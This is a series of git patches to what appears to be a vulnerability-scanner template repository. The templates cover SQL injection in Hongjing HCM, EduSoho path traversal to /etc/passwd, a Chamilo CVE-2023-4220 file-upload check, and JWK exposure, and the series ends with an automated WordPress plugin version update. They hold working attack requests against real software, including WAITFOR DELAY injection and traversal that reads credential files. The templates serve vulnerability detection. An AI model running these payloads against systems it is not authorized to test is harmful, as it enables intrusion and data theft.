@@ -1,8 +1,9 @@ id: hjsoft-hcm-tb-sqli + info: name: Hongjing HCM - Time-Based Sql Injection author: securityforeveryone - severity: critical + severity: high description: | There is a SQL injection vulnerability in the /gz/LoadOtherTreeServlet interface of Hongjing HCM. Unauthenticated remote attackers can use the SQL injection vulnerability with the database xp_cmdshell to execute arbitrary commands and control the server. After analysis and judgment, the vulnerability is easy to exploit and it is recommended to be fixed as soon as possible. reference: @@ -11,18 +12,20 @@ info: verified: true max-request: 1 fofa-query: app="HJSOFT-HCM" - tags: sqli,time-based-sqli,hjsoft,management-system + tags: sqli,hjsoft,management-system http: - raw: - | @timeout: 20s GET /w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A6%27--&flag=1 HTTP/1.1 + Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration>=6' - - 'contains_all(body,"root","title","text","?xml version")' + - 'contains_all(body,"TreeNode","tab_id")' + - 'contains(header,"text/xml")' - 'status_code == 200' condition: and From c1dcca687f533e9bc0190b20fee9af807660f2b4 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 9 Jul 2024 16:11:06 +0530 Subject: [PATCH 1019/1841] Create apache-cloudstack-detect.yaml --- .../apache/apache-cloudstack-detect.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/technologies/apache/apache-cloudstack-detect.yaml diff --git a/http/technologies/apache/apache-cloudstack-detect.yaml b/http/technologies/apache/apache-cloudstack-detect.yaml new file mode 100644 index 0000000000..2711a75a58 --- /dev/null +++ b/http/technologies/apache/apache-cloudstack-detect.yaml @@ -0,0 +1,28 @@ +id: apache-cloudstack-detect + +info: + name: Apache CloudStack - Detect + author: pussycat0x + severity: info + description: + CloudStack is open-source Infrastructure-as-a-Service cloud computing software for creating, managing, and deploying infrastructure cloud services. It uses existing hypervisor platforms for virtualization, such as KVM, VMware vSphere, including ESXi and vCenter, XenServer/XCP and XCP-ng. + metadata: + shodan-query: http.title:"Apache CloudStack" + tags: tech,apache,cloudstack + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Apache CloudStack" + + - type: status + status: + - 200 From 1ab8504e088a4b60f866c83394c81add2c1b1128 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 9 Jul 2024 16:14:29 +0530 Subject: [PATCH 1020/1841] minor update --- http/vulnerabilities/{other => hjsoft}/hjsoft-hcm-sqli.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename http/vulnerabilities/{other => hjsoft}/hjsoft-hcm-sqli.yaml (93%) diff --git a/http/vulnerabilities/other/hjsoft-hcm-sqli.yaml b/http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml similarity index 93% rename from http/vulnerabilities/other/hjsoft-hcm-sqli.yaml rename to http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml index 6d06152f65..18754dbfec 100644 --- a/http/vulnerabilities/other/hjsoft-hcm-sqli.yaml +++ b/http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml @@ -3,7 +3,7 @@ id: hjsoft-hcm-sqli info: name: Hongjing HCM - Sql Injection author: securityforeveryone - severity: critical + severity: high description: | There is a SQL injection vulnerability in the /servlet/sduty/getSdutyTree interface of Hongjing HCM. Unauthenticated remote attackers can execute arbitrary commands by exploiting the SQL injection vulnerability with the database xp_cmdshell, thereby controlling the server. reference: @@ -25,6 +25,7 @@ http: matchers: - type: dsl dsl: - - 'contains_all(body,"qxjpqjwUIWcKtHqhkYslITEIKSbtxYTRxTtXpWImhWfaMqvjzq","root","codeitem")' + - 'contains(body,"qxjpqjwUIWcKtHqhkYslITEIKSbtxYTRxTtXpWImhWfaMqvjzq")' + - 'contains(header,"text/xml")' - 'status_code == 200' condition: and From 91e242bd35d1a340c6e7f3548ab686c563213948 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 9 Jul 2024 16:18:40 +0530 Subject: [PATCH 1021/1841] minor update --- .../other/{ => hjsoft}/hjsoft-hcm-lfi.yaml | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) rename http/vulnerabilities/other/{ => hjsoft}/hjsoft-hcm-lfi.yaml (88%) diff --git a/http/vulnerabilities/other/hjsoft-hcm-lfi.yaml b/http/vulnerabilities/other/hjsoft/hjsoft-hcm-lfi.yaml similarity index 88% rename from http/vulnerabilities/other/hjsoft-hcm-lfi.yaml rename to http/vulnerabilities/other/hjsoft/hjsoft-hcm-lfi.yaml index 4d19cd337c..adc3fc822b 100644 --- a/http/vulnerabilities/other/hjsoft-hcm-lfi.yaml +++ b/http/vulnerabilities/other/hjsoft/hjsoft-hcm-lfi.yaml @@ -3,7 +3,7 @@ id: hjsoft-hcm-lfi info: name: Hongjing HCM - Local File Inclusion author: securityforeveryone - severity: critical + severity: high description: | There is an arbitrary file read vulnerability in the Hongjing eHR /DownLoadCourseware interface. Unauthenticated attackers can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., causing the website to be extremely unsafe. reference: @@ -24,13 +24,18 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "bit app support" - - "[fonts]" - - "[extensions]" - - "[files]" + - "fonts" + - "extensions" condition: and + - type: word + part: content_type + words: + - "multipart/form-data" + - type: status status: - 200 From ca18b039f71d65a1e1ef5e4ef11706c9aa233193 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 9 Jul 2024 16:19:04 +0530 Subject: [PATCH 1022/1841] Rename http/vulnerabilities/other/hjsoft/hjsoft-hcm-lfi.yaml to http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml --- http/vulnerabilities/{other => }/hjsoft/hjsoft-hcm-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/vulnerabilities/{other => }/hjsoft/hjsoft-hcm-lfi.yaml (100%) diff --git a/http/vulnerabilities/other/hjsoft/hjsoft-hcm-lfi.yaml b/http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml similarity index 100% rename from http/vulnerabilities/other/hjsoft/hjsoft-hcm-lfi.yaml rename to http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml From 9afd29887fb0e5b57e486f3bfff09375c1ebe558 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 9 Jul 2024 16:26:47 +0530 Subject: [PATCH 1023/1841] minor update --- http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml b/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml index 4c26f4d053..d9c560087b 100644 --- a/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml @@ -1,4 +1,5 @@ id: h3c-cnsss-arbitrary-file-upload + info: name: H3C CNSSS - Arbitrary File Upload author: securityforeveryone From 793fcde965fe483084cce89446380f2389da5c7d Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 15:39:09 +0300 Subject: [PATCH 1024/1841] add edusoho-lfi --- http/vulnerabilities/other/edusoho-lfi.yaml | 36 +++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/vulnerabilities/other/edusoho-lfi.yaml diff --git a/http/vulnerabilities/other/edusoho-lfi.yaml b/http/vulnerabilities/other/edusoho-lfi.yaml new file mode 100644 index 0000000000..1857899ec0 --- /dev/null +++ b/http/vulnerabilities/other/edusoho-lfi.yaml @@ -0,0 +1,36 @@ +id: edusoho-lfi + +info: + name: EduSoho < v22.4.7 - Local File Inclusion + author: securityforeveryone + severity: critical + description: | + The edusoho education and training system EduSoho" || (body="Powered By EduSoho" && body="var app") + tags: EduSoho,classroom-course,CNVD-2023-03903,lfi + +http: + - raw: + - | + GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From 198f84c9b616c6753af71aead478095aa8a55a23 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 15:52:25 +0300 Subject: [PATCH 1025/1841] fix --- http/vulnerabilities/other/edusoho-lfi.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/edusoho-lfi.yaml b/http/vulnerabilities/other/edusoho-lfi.yaml index 1857899ec0..4b13eb3f5f 100644 --- a/http/vulnerabilities/other/edusoho-lfi.yaml +++ b/http/vulnerabilities/other/edusoho-lfi.yaml @@ -5,9 +5,7 @@ info: author: securityforeveryone severity: critical description: | - The edusoho education and training system Date: Tue, 9 Jul 2024 17:56:08 +0300 Subject: [PATCH 1026/1841] add CVE-2023-4220 --- http/cves/2023/CVE-2023-4220.yaml | 53 +++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/cves/2023/CVE-2023-4220.yaml diff --git a/http/cves/2023/CVE-2023-4220.yaml b/http/cves/2023/CVE-2023-4220.yaml new file mode 100644 index 0000000000..bf21754170 --- /dev/null +++ b/http/cves/2023/CVE-2023-4220.yaml @@ -0,0 +1,53 @@ +id: CVE-2023-4220 +info: + name: Chamilo LMS <= 1.11.24 - Remote Code Execution + author: securityforeveryone + severity: medium + description: | + Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell. + reference: + - https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit + - https://nvd.nist.gov/vuln/detail/CVE-2023-4220 + - https://github.com/charlesgargasson/CVE-2023-4220 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4220 + cwe-id: CWE-434 + epss-score: 0.00163 + epss-percentile: 0.52876 + cpe: cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* + metadata: + vendor: chamilo + product: chamilo_lms + shodan-query: cpe:"cpe:2.3:a:chamilo:chamilo_lms" + tags: cve,cve2024,chamilo,lms,rce +variables: + filename: "{{rand_base(10)}}" + num: "{{rand_int(1000, 9999)}}" + +http: + - raw: + - | + POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------SwxF5rRaZb4lETWlpulXn3 + + --------------------------SwxF5rRaZb4lETWlpulXn3 + Content-Disposition: form-data; name="bigUploadFile"; filename="{{filename}}.txt" + Content-Type: application/octet-stream + + {{md5(num)}} + + --------------------------SwxF5rRaZb4lETWlpulXn3-- + + - | + GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_2,"{{md5(num)}}")' + - 'status_code_1 == 200 && status_code_2 == 200' + condition: and \ No newline at end of file From 67b2934f4ed8469f807008d6d732af1410ea306e Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 17:59:23 +0300 Subject: [PATCH 1027/1841] fix --- http/cves/2023/CVE-2023-4220.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-4220.yaml b/http/cves/2023/CVE-2023-4220.yaml index bf21754170..31e7c3c23f 100644 --- a/http/cves/2023/CVE-2023-4220.yaml +++ b/http/cves/2023/CVE-2023-4220.yaml @@ -21,7 +21,7 @@ info: vendor: chamilo product: chamilo_lms shodan-query: cpe:"cpe:2.3:a:chamilo:chamilo_lms" - tags: cve,cve2024,chamilo,lms,rce + tags: cve,cve2023,chamilo,lms,rce variables: filename: "{{rand_base(10)}}" num: "{{rand_int(1000, 9999)}}" @@ -40,7 +40,7 @@ http: {{md5(num)}} --------------------------SwxF5rRaZb4lETWlpulXn3-- - + - | GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} @@ -50,4 +50,4 @@ http: dsl: - 'contains(body_2,"{{md5(num)}}")' - 'status_code_1 == 200 && status_code_2 == 200' - condition: and \ No newline at end of file + condition: and From b35bd321f99e7bdde4a000492a5b8edf6c5c98e5 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 9 Jul 2024 22:23:10 +0530 Subject: [PATCH 1028/1841] Create jwk-json-leak.yaml --- http/exposures/tokens/jwk-json-leak.yaml | 31 ++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/exposures/tokens/jwk-json-leak.yaml diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml new file mode 100644 index 0000000000..2c631045ec --- /dev/null +++ b/http/exposures/tokens/jwk-json-leak.yaml @@ -0,0 +1,31 @@ +id: jwk-json-leak + +info: + name: JSON Web Key File - leak + author: Mohsen Yaghoubi + severity: medium + description: | + Searches for JSON Web Key (JWK) file. + reference: + - https://portswigger.net/web-security/jwt/algorithm-confusion + tags: exposure,token,generic + +http: + - method: GET + path: + - "{{BaseURL}}/.well-known/jwks.json" + - "{{BaseURL}}/.well-known/jwks" + - "{{BaseURL}}/jwks.json" + - "{{BaseURL}}/jwks" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + name: id + words: + - '"kid":' + + - type: status + status: + - 200 From f327acd133720d7f010302af1c3a6574c5b243c0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 9 Jul 2024 22:25:44 +0530 Subject: [PATCH 1029/1841] lint -fix --- http/exposures/tokens/jwk-json-leak.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml index 2c631045ec..e9c0299e0b 100644 --- a/http/exposures/tokens/jwk-json-leak.yaml +++ b/http/exposures/tokens/jwk-json-leak.yaml @@ -1,4 +1,4 @@ -id: jwk-json-leak +id: jwk-json-leak info: name: JSON Web Key File - leak From 53a76df487d96cf001ff8c2847576ad0cfb1be29 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 9 Jul 2024 22:49:26 +0530 Subject: [PATCH 1030/1841] Update jwk-json-leak.yaml --- http/exposures/tokens/jwk-json-leak.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml index e9c0299e0b..a96df40002 100644 --- a/http/exposures/tokens/jwk-json-leak.yaml +++ b/http/exposures/tokens/jwk-json-leak.yaml @@ -1,13 +1,17 @@ id: jwk-json-leak info: - name: JSON Web Key File - leak + name: JSON Web Key File - Exposure author: Mohsen Yaghoubi severity: medium description: | Searches for JSON Web Key (JWK) file. reference: - https://portswigger.net/web-security/jwt/algorithm-confusion + metadata: + shodan-query: html:"jwks.json" + verified: true + max-request: 1 tags: exposure,token,generic http: @@ -22,10 +26,15 @@ http: matchers-condition: and matchers: - type: word - name: id + part: body words: - '"kid":' + - type: word + part: content_type + words: + - 'application/json' + - type: status status: - 200 From 8ebe2887dda6ee1b74dfb5e78eef1720a3d1e80e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 00:20:01 +0000 Subject: [PATCH 1031/1841] Auto WordPress Plugins Update [Wed Jul 10 00:20:01 UTC 2024] :robot: --- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/formidable.txt | 2 +- helpers/wordpress/plugins/google-listings-and-ads.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/mainwp-child.txt | 2 +- helpers/wordpress/plugins/ml-slider.txt | 2 +- helpers/wordpress/plugins/newsletter.txt | 2 +- helpers/wordpress/plugins/ninja-forms.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- helpers/wordpress/plugins/simple-history.txt | 2 +- helpers/wordpress/plugins/sucuri-scanner.txt | 2 +- helpers/wordpress/plugins/wpforms-lite.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 3 +-- http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 212 files changed, 13 insertions(+), 213 deletions(-) diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index 64012886c3..4b8dea47bb 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -4.3.6 \ No newline at end of file +4.3.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/formidable.txt b/helpers/wordpress/plugins/formidable.txt index 2e11d54366..c68232647c 100644 --- a/helpers/wordpress/plugins/formidable.txt +++ b/helpers/wordpress/plugins/formidable.txt @@ -1 +1 @@ -6.11 \ No newline at end of file +6.11.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index 460b6fd404..5b013b97d6 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.7.5 \ No newline at end of file +2.7.6 \ No newline at end of file diff --git 